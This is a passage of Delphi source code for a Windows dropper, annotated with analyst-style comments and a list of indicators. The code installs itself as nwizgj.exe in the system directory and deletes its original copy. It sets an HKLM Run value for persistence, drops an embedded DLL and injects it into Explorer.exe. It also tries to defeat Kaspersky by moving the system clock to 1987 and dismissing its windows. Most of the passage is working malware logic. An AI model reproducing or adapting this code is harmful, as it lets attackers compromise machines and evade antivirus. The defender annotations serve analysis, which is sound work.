  TimePart := EncodeTime(LocalNow.wHour, LocalNow.wMinute, LocalNow.wSecond,
    LocalNow.wMilliseconds);
  Result := DatePart + TimePart;
end;
function TryEncodeDateTime(const AYear, AMonth, ADay, AHour, AMinute, ASecond,
  AMilliSecond: Word; out AValue: TDateTime): Boolean;
// Combines TryEncodeDate and TryEncodeTime. Returns True only when both succeed,
// in which case AValue holds date + time. When only the time part is invalid,
// AValue keeps the date value already stored by TryEncodeDate.
var
  TimePart: TDateTime;
begin
  Result := False;
  if not TryEncodeDate(AYear, AMonth, ADay, AValue) then
    Exit;
  if not TryEncodeTime(AHour, AMinute, ASecond, AMilliSecond, TimePart) then
    Exit;
  AValue := AValue + TimePart;
  Result := True;
end;
// Returns the combined date-time value via TryEncodeDateTime.
// The Boolean outcome is ignored, so for invalid fields Result holds whatever
// TryEncodeDateTime left in its out parameter (possibly nothing).
function EncodeDateTime(const AYear, AMonth, ADay, AHour, AMinute, ASecond,
AMilliSecond: Word): TDateTime;
begin
TryEncodeDateTime(AYear, AMonth, ADay,
AHour, AMinute, ASecond, AMilliSecond, Result);
end;
// Sets the machine's local clock to the given date and time via SetLocalTime.
// The main program uses it to move the year to 1987 when avp.exe is running and to
// move it back afterwards.
// Defender note: an unexpected system-time change made by a user-mode program,
// especially a jump of many years, is itself an auditable event. It also distorts
// timestamps recorded while the clock is wrong, which matters for timeline analysis.
procedure SetTime(y,m,d,h,min,se,ms:word);
var rq:tdatetime;
SysTime: TSystemTime;
begin
rq:=EncodeDateTime(y,m,d,h,min,se,ms);
DateTimeToSystemTime(rq,SysTime);
//SetSystemTime(SysTime) ;
setlocaltime(SysTime);
end;
// ---- Program entry point ----
// Helpers Wait, Find_Window, Create_Window, GetSystemDir, SetStrValue, CompareAnsiText,
// OutputDebugText and the EXE_Window* constants are declared outside this listing.
// Observed flow:
//   1. Exit if a window with EXE_WindowClass / EXE_WindowTitle already exists.
//   2. Enable SeDebugPrivilege, check for avp.exe, start the CloseKaoBa thread.
//   3. If avp.exe was found: set the year to 1987 and wait 10 s -- presumably to
//      disturb date-dependent checks in that product; the reason is not stated here.
//   4. Run HasKV. If not running from GetSystemDir(1) + 'nwizgj.exe', copy itself
//      there, start the copy, schedule self-deletion and exit.
//   5. Otherwise write the 'nwizgj' Run value, drop nwizgj.dll from the 'hook'
//      resource and load it into Explorer.exe through InjectLibrary.
//   6. finally (also on the early exits inside the try): stop the thread, restore
//      the year (at least 2007) and call ExitProcess.
// Indicators visible on this page: nwizgj.exe and nwizgj.dll under the GetSystemDir(1)
// path, the HKLM Run value 'nwizgj', c:\mynw.bat, and a clock jump to 1987.
var
Msg: TMsg;
szBuffer: Array[0..MAX_PATH] of Char;
StrSelfModule, StrInstallPath, StrHookModule,tmp: string;
HookOn, HookOff: procedure;
hModule,Process: THandle;
thh:cardinal;
kb:boolean;
y,m,d,h,min,se,ms,y_tmp:word;
begin
Wait(1000);
// Single-instance check through a marker window.
if Find_Window(EXE_WindowClass, EXE_WindowTitle) then
begin
{$IFDEF Test}
OutputDebugText('寻找到EXE互斥窗口退出!');
{$ENDIF}
Exit;
end;
ZeroMemory(@szBuffer, MAX_PATH);
GetModuleFileName(0, szBuffer, MAX_PATH);
StrSelfModule := PChar(@szBuffer);
StrInstallPath := GetSystemDir(1) + 'nwizgj.exe';
{$IFDEF Test}
OutputDebugText('自身路径: ' + StrSelfModule);
OutputDebugText('安装路径: ' + StrInstallPath);
{$ENDIF}
// Original comment: "enable the close-Kaspersky-window feature".
//CreateThread(nil, 1024, @ThreadFuncProc, nil, 0, nil);
EnabledDebugPrivilege(true);
// kb records whether avp.exe was running at start-up.
kb:=HasKaba;
flag_end:=false;
// Start the prompt-dismissing loop in a separate thread.
CreateThread(nil, 0, @CloseKaoBa, nil, 0, thh);
if kb then
try
// Remember the real year in y_tmp, then set the clock's year to 1987.
DecodeDateTime(now,Y, M, d,h,min,se,ms);
y_tmp:=y;
y:=1987;
SetTime(y,m,d,h,min,se,ms);
sleep(10*1000);
except
end;
HasKV;
try
// First run from an arbitrary location: install to the target path and hand over.
if CompareAnsiText(StrInstallPath, StrSelfModule)=false then
begin
DeleteFile(PChar(StrInstallPath));
CopyFile(PChar(StrSelfModule), PChar(StrInstallPath), False);
WinExec(PChar(StrInstallPath), SW_SHOW);
ExtDelMe(paramstr(0));
exit;
end;
Wait(1000);
// Persistence: HKLM Run value 'nwizgj' pointing at this executable.
SetStrValue(HKEY_LOCAL_MACHINE, CSTR_REGEdit, 'nwizgj', PChar(StrSelfModule));
StrHookModule := GetSystemDir(1)+'nwizgj.dll';
{$IFDEF Test}
OutputDebugText('Hook模块保存路径: ' + StrHookModule);
{$ENDIF}
// Remove an existing copy of the DLL; give up if it cannot be deleted.
if fileexists(StrHookModule) then
begin
deletefile(pchar(StrHookModule));
sleep(1000);
if fileexists(StrHookModule) then exit;
end;
// Drop the embedded DLL (resource type 'hook', name 'dll').
if Not ExtractRes('hook','dll',StrHookModule) then
begin
{$IFDEF Test}
OutputDebugText('保存Hook模块失败!退出程序!');
{$ENDIF}
Exit;
end{$IFDEF Test}else OutputDebugText('保存Hook模块成功!'){$ENDIF};
// Create the marker window that the single-instance check above looks for.
if Create_Window(EXE_WindowClass, EXE_WindowTitle) then
begin
{$IFDEF Test}
OutputDebugText('开始进行DLL进程插入!');
{$ENDIF}
EnabledDebugPrivilege(true);
// hModule is reused here to hold the process ID of Explorer.exe.
hModule:=GetProcessID('Explorer.exe');
if hModule>0 then
begin
Process := OpenProcess(PROCESS_ALL_ACCESS, False, hModule);
if Process>0 then
begin
try
EnabledDebugPrivilege(true);
haskv;
sleep(2000);
except
end;
if InjectLibrary(Process,pchar(StrHookModule)) then
begin
{$IFDEF Test}
OutputDebugText('DLL进程插入成功!');
{$ENDIF}
end
else
begin
{$IFDEF Test}
OutputDebugText('DLL进程插入失败!');
{$ENDIF}
end;
end;
end;
end{$IFDEF Test}else OutputDebugText('窗口创建失败!'){$ENDIF};
finally
// Stop the CloseKaoBa loop and give it a second to exit.
flag_end:=true;
sleep(1000);
if kb then
try
// Put the saved year back, but never earlier than 2007.
DecodeDateTime(now,Y, M, d,h,min,se,ms);
y:=y_tmp;
if y<2007 then y:=2007;
SetTime(y,m,d,h,min,se,ms);
except
end;
ExitProcess(0);
end;
exit;
end.

